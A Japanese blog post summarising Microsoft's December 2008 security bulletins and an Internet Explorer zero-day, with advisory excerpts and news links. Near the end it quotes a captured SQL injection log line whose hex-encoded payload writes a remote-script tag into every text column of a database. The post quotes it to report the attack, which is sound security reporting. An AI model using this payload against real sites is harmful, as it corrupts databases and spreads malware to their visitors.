2008 年 12 月のセキュリティ情報(情報元のブックマーク数)
完全に放置している間にMicrosoftのセキュリティパッチが出ていました!
http://www.microsoft.com/japan/technet/security/bulletin/ms08-dec.mspx
セキュリティ情報 ID 番号 タイトルおよび概要 最大深刻度および脆弱性の影響 再起動情報 影響を受けるソフトウェア MS08-071 GDI の脆弱性により、リモートでコードが実行される (956802)
この深刻度セキュリティ更新プログラムは、非公開で報告された 2 件の GDI に存在する脆弱性を解決します。これらの脆弱性のいずれかが悪用された場合、ユーザーが特別な細工がされた WMF 画像ファイルを開くと、リモートでコードが実行される可能性があります。これらの脆弱性を攻撃者が悪用した場合、影響を受けるコンピュータが完全に制御される可能性があります。その後、攻撃者はプログラムをインストール、データの表示、変更、削除、または完全なユーザー権限を持つ新たなアカウントを作成する可能性があります。緊急 リモートでコードが実行される 要再起動 Microsoft Windows MS08-075 Windows Search の脆弱性により、リモートでコードが実行される (959349)
このセキュリティ更新プログラムは、非公開で報告された 2 件の Windows Search に存在する脆弱性を解決します。これらの脆弱性で、特別な細工がされた保存された検索ファイルがWindows エクスプローラーで開かれ、保存された場合、またはユーザーが特別な細工がされた 検索 URL をクリックした場合、リモートでコードが実行される可能性があります。これらの脆弱性を攻撃者が悪用した場合、影響を受けるコンピューターが完全に制御される可能性があります。その後、攻撃者はプログラムをインストール、データの表示、変更、削除、または完全なユーザー権限を持つ新たなアカウントを作成する可能性があります。コンピューターのアカウントのユーザー権限を低く設定している場合、管理者ユーザー権限で実行しているユーザーよりもこの脆弱性の影響が少なくなると考えられます。緊急 リモートでコードが実行される 要再起動 Microsoft Windows MS08-073 Internet Explorer 用の累積的なセキュリティ更新プログラム (958215)
この累積的な更新プログラムは非公開で報告された 4 つの脆弱性を解決します。これらの脆弱性により、ユーザーが Internet Explorer を使用して特別な細工がされた Web ページを表示すると、リモートでコードが実行される可能性があります。コンピューターのアカウントのユーザー権限を低く設定している場合、管理者ユーザー権限で実行しているユーザーよりもこの脆弱性の影響が少なくなると考えられます。緊急 リモートでコードが実行される 要再起動 Microsoft Windows, Internet Explorer MS08-070 Visual Basic 6.0 ランタイム拡張ファイル (ActiveX コントロール) の脆弱性により、リモートでコードが実行される (932349)
このセキュリティ更新プログラムは 5 件の非公開で報告された脆弱性および 1 件の一般に公開された Microsoft Visual Basic 6.0 ランタイム拡張ファイル の ActiveX コントロールの脆弱性を解決します。これらの脆弱性により、ユーザーが特別に細工されたコンテンツが含まれる Web サイトを閲覧した場合、リモートでコードが実行される可能性があります。コンピューターのアカウントのユーザー権限を低く設定している場合、管理者ユーザー権限で実行しているユーザーよりもこの脆弱性の影響が少なくなると考えられます。緊急 リモートでコードが実行される 要再起動 Microsoft 開発者用ツールおよびソフトウェア, Microsoft Office MS08-072 Microsoft Word の脆弱性により、リモートでコードが実行される (957173)
このセキュリティ更新プログラムは非公開で報告された 8 件の Microsoft Office Word および Microsoft Office Outlookの脆弱性を解決します。この脆弱性では、ユーザーが特別に細工された Word またはリッチ テキスト形式 (RTF) ファイルを表示した場合、リモートでコードが実行される可能性があります。これらの脆弱性を攻撃者が悪用した場合、影響を受けるコンピューターが完全に制御される可能性があります。その後、攻撃者はプログラムをインストール、データの表示、変更、削除、または完全なユーザー権限を持つ新たなアカウントを作成する可能性があります。コンピューターのアカウントのユーザー権限を低く設定している場合、管理者ユーザー権限で実行しているユーザーよりもこの脆弱性の影響が少なくなると考えられます。緊急 リモートでコードが実行される 再起動が必要な場合あり Microsoft Office MS08-074 Microsoft Office Excel の脆弱性により、リモートでコードが実行される (959070)
このセキュリティ更新プログラムは、特別な細工がされた Excel ファイルをユーザーが表示した場合、リモートでコードが実行される可能性がある Microsoft Office Excel に存在する非公開で報告されたいくつかの脆弱性を解決します。これらの脆弱性を攻撃者が悪用した場合、影響を受けるコンピューターが完全に制御される可能性があります。その後、攻撃者はプログラムをインストール、データの表示、変更、削除、または完全なユーザー権限を持つ新たなアカウントを作成する可能性があります。コンピューターのアカウントのユーザー権限を低く設定している場合、管理者ユーザー権限で実行しているユーザーよりもこの脆弱性の影響が少なくなると考えられます。緊急 リモートでコードが実行される 再起動が必要な場合あり Microsoft Office MS08-077 Microsoft Office SharePoint Server の脆弱性により、特権が昇格される (957175)
この更新プログラムは非公開で報告された脆弱性を解決します。攻撃者が SharePoint サイト上の管理 URL をブラウズすることにより認証を無視した場合、この脆弱性により特権が昇格される可能性があります。特権が昇格される攻撃が行われると、サービス拒否または情報の漏えいが引き起こされる可能性があります。重要 特権の昇格 再起動が必要な場合あり Microsoft Office, Microsoft サーバー ソフトウェア MS08-076 Windows Media コンポーネントの脆弱性により、リモートでコードが実行される (959807)
このセキュリティ更新プログラムは、非公開で報告された 2 件の Windows Media コンポーネントに存在する脆弱性を解決します。これらの中で最も深刻な脆弱性により、リモートでコードが実行される可能性があります。ユーザーが管理者ユーザー権限でログオンしている場合、攻撃者はこの脆弱性を悪用して、影響を受けるコンピューターを完全に制御する可能性があります。その後、攻撃者はプログラムをインストール、データの表示、変更、削除、または完全なユーザー権限を持つ新たなアカウントを作成する可能性があります。コンピューターのアカウントのユーザー権限を低く設定している場合、管理者ユーザー権限で実行しているユーザーよりもこの脆弱性の影響が少なくなると考えられます。重要 リモートでコードが実行される 再起動が必要な場合あり Microsoft Windows
これはひどい。
特権の昇格の脆弱性が Microsoft Office SharePoint Server 2007 および Microsoft Office SharePoint Server 2007 Service Pack 1 に存在します。 攻撃者が SharePoint のサイトにて管理用の URL を直接参照し、認証を無視した場合、特権が昇格される可能性があります。 特権が昇格される攻撃が行われると、サービス拒否または情報の漏えいが引き起こされる可能性があります。
http://www.microsoft.com/japan/technet/security/bulletin/ms08-077.mspx
search-ms プロトコル ハンドラーなんてあったんだ。
Windows エクスプローラーが Windows Search ファイルを保存する時に正しくメモリを解放しないため、この脆弱性が起こります。
http://www.microsoft.com/japan/technet/security/bulletin/ms08-075.mspx
またGDIか!gdi32.dllですか!またですか!
マイクロソフト セキュリティ情報 MS08-052 - 緊急 : GDI+ の脆弱性により、リモートでコードが実行される (954593)でもあったじゃないですか!
この深刻度セキュリティ更新プログラムは、非公開で報告された 2 件の GDI に存在する脆弱性を解決します。これらの脆弱性のいずれかが悪用された場合、ユーザーが特別な細工がされた WMF 画像ファイルを開くと、リモートでコードが実行される可能性があります。これらの脆弱性を攻撃者が悪用した場合、影響を受けるコンピュータが完全に制御される可能性があります。その後、攻撃者はプログラムをインストール、データの表示、変更、削除、または完全なユーザー権限を持つ新たなアカウントを作成する可能性があります。コンピューターのアカウントのユーザー権限を低く設定している場合、管理者ユーザー権限で実行しているユーザーよりもこの脆弱性の影響が少なくなると考えられます。
http://www.microsoft.com/japan/technet/security/bulletin/ms08-071.mspx
小野寺さんのBlogでも出ていますね。GDIとか展開が気になりますね。
MS08-071 (GDI):
http://blogs.technet.com/jpsecurity/archive/2008/12/10/3165894.aspx
特別な細工がされた WMF 画像ファイルを開くと、リモートでコードが実行される可能性のある脆弱性に対処しています。
MS08-072 (Word):
特別に細工された Word またはリッチ テキスト形式 (RTF) ファイルを表示した場合、リモートでコードが実行される可能性のある脆弱性に対処しています。 Microsoft Office Word および、Microsoft Office Outlookが影響を受けます。
本日、公開しているセキュリティ アドバイザリとは別の脆弱性となります。
MS08-073 (IE):
特別な細工がされた Web ページを表示すると、リモートでコードが実行される可能性のある脆弱性に対処しています。
MS08-074 (Excel):
特別な細工がされた Excel ファイルをユーザーが表示した場合、リモートでコードが実行される可能性がある脆弱性に対処しています。
幾つかの既知の注意点については、http://support.microsoft.com/kb/959070 に記載しています。
MS08-075 (Windows Search):
特別な細工がされた保存された検索ファイルがWindows エクスプローラーで開かれ、保存された場合、またはユーザーが特別な細工がされた検索 URLをクリックした場合、リモートでコードが実行される可能性があります。
MS08-076 (WMC):
特別な細工がされたサーバーまたは、Webサイトにアクセスする事で、資格情報が悪用され、結果として、リモートでコードが実行される可能性のある脆弱性に対処しています。
MS08-077 (SharePoint):
SharePoint サイトの管理用 URLを直接参照し、特定の操作をする事で、特権が昇格される可能性がある脆弱性に対処しています。
幾つかの既知の注意点については、http://support.microsoft.com/kb/957175 に記載しています。
IEが落ちる脆弱性が存在とのことで、セキュリティアドバイザリーが出ていますね。
OLEDB32.DLL を無効にするとか書いてあるので、このあたりみたいです。
Internet Explorer のデータ バインディング機能のポインター参照が無効であるため、この脆弱性が存在します。 データ バインディングが有効 (これが既定の状態です) である場合、特定の状況でオブジェクトが配列の長さを更新せずにリリースされるため、削除されたオブジェクトのメモリ空間にアクセスできる可能性があります。 これは Internet Explorer が予期せずに終了する原因となり、この状態で脆弱性の悪用が可能となります。
http://www.microsoft.com/japan/technet/security/advisory/961051.mspx
あわせて、ワードパッドによるコンバータな処理に関する問題がでていて、これもセキュリティアドバイザリが出ています。
マイクロソフトは Windows 2000 Service Pack 4、Windows XP Service Pack 2、Windows Server 2003 Service Pack 1 および Windows Server 2003 Service Pack 2 の Word 97 ファイル用の ワードパッド テキスト コンバーターの脆弱性の新たな報告について調査中です。Windows XP Service Pack 3、Windows Vista および Windows Server 2008 には脆弱なコードが含まれていないため、この脆弱性の影響を受けません。
http://www.microsoft.com/japan/technet/security/advisory/960906.mspx
Zero-Day攻撃が出ているそうです。
MicrosoftのInternet Explorerが持つ未パッチのセキュリティホールを狙う、パスワードを盗むトロイの木馬攻撃は、同ブラウザのすべてのバージョンにまで広がっており、これには最新のIE 8 Beta 2も含まれている。
Internet Explorerに対するゼロデイ攻撃広がる - ZDNet Japan
Microsoftはこの潜在的なセキュリティホールはIE 7以外にも影響があることを警告する新たなアドバイザリを発表し、実際の攻撃から受けるダメージを限定することのできる、追加的な回避手段について説明している。
ISCより、SQLインジェクション攻撃が発生していてMSIEのZero-Dayを悪用してJavascriptを入れて攻撃しているそうです。
One of our readers submitted this log entry, which shows a typical SQL injection exploit. The "new" part is that the javascript injected in this case is trying to exploit the MSIE 0-day:
InfoSec Handlers Diary Blog - MSIE 0-day Spreading Via SQL Injection
Cookie: ref=ef';DECLA RE @S VARCHAR(4000);SET @S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263
InfoSec Handlers Diary Blog - MSIE 0-day Spreading Via SQL Injection
6861722832353529204445434C415245205461626C655F437572736F7220435552534F52
20464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F62
6A6563747320612C737973636F6C756D6E7306220776865726520612E69643D622E69642
0616E6420612E78747970653D27752720616E642028622E78747970653D3939206F72206
22E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653
D31363729204F50454E205461626C655F437572736F72204645544348204E45585420465
24F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404
046455443485F5354415455533D302920424547494E20657865632827757064617465205
B272B40542B275D20736574205B272B40432B275D3D727472696D28636F6E76657274287
66172636861722834303030292C5B272B40432B275D29292B27273C73637269707420737
2633D687474703A2F2F313767616D6F2E636F6D2F312E6A733E3C2F7363726970743E272
727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544
F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4
F43415445205461626C655F437572736F72 AS VARCHAR(4000));exec (@S);--
MS08-070がPATCHNOWになっていますね。
InfoSec Handlers Diary Blog - December Black Tuesday Overview
関連URL
IE7系
- MS Internet Explorer XML Parsing Buffer Overflow Exploit (vista) 0day
- Zero-Day IE7 Flaw Being Actively Exploited | TrendLabs | Malware Blog - by Trend Micro
- Internet Explorer: zero-day exploit
- More on the Internet Explorer zero-day
- IE Zero-Day Follow-Up: Now Featuring Mass SQL Injections | TrendLabs | Malware Blog - by Trend Micro
- SQLインジェクション攻撃も発生:MSがIE 7の脆弱性を確認、アドバイザリーを公開 - ITmedia エンタープライズ
- SANS Internet Storm Center; Cooperative Network Security Community - Internet Security - isc
- Security Vulnerability Research & Defense : Clarification on the various workarounds from the recent IE advisory
- 正規サイトに「ゼロデイ攻撃」のわな、IEの新しい脆弱性を狙う:ITpro
- IE7 Exploits for XP and Vista published | Hackers Center Blogs
- IE 7 0day allows malware spreading | Hackers Center Blogs
- Internet Security | Vulnerability Assessment | Computer Network Security | Vulnerability Management
- セキュリティホール memo
- にわか鯖管の苦悩日記 _| ̄|●(2008-12-12)
- Computer Security Research - McAfee Avert Labs Blog
- Zero-Day IE7 Flaw Being Actively Exploited | TrendLabs | Malware Blog - by Trend Micro
- Internet Explorer: zero-day exploit
- More on the Internet Explorer zero-day
- IE Zero-Day Follow-Up: Now Featuring Mass SQL Injections | TrendLabs | Malware Blog - by Trend Micro
- SQLインジェクション攻撃も発生:MSがIE 7の脆弱性を確認、アドバイザリーを公開 - ITmedia エンタープライズ
- SANS Internet Storm Center; Cooperative Network Security Community - Internet Security - isc
- Security Vulnerability Research & Defense : Clarification on the various workarounds from the recent IE advisory
- マイクロソフト、12月の月例パッチを公開--「緊急」が6件と「重要」が2件:ニュース - CNET Japan
- IE全バージョン・データバインディング機能の脆弱性 : 投稿 : HotFix Report BBS
- Extremely Dangerous Internet Explorer Security Hole - Beware! - F-Secure Weblog : News from the Lab
- IE7 Zero Day Technical Analysis - Security Labs Blog
- 「Internet Explorer」のパッチ未対応の脆弱性、影響は全バージョンに : CNETニュース : ネット&デジタル : YOMIURI ONLINE(読売新聞)
- パッチが提供されないIEの脆弱性、「IE7以外も影響、回避策は複数」:ITpro
- IE7の脆弱性を狙ったゼロデイ攻撃に対応する
- SecuriTeam Blogs ≫ Top Exploits of the Week #1
- IE 8のβ版にも:IEの未解決の脆弱性は全バージョンに影響 - ITmedia エンタープライズ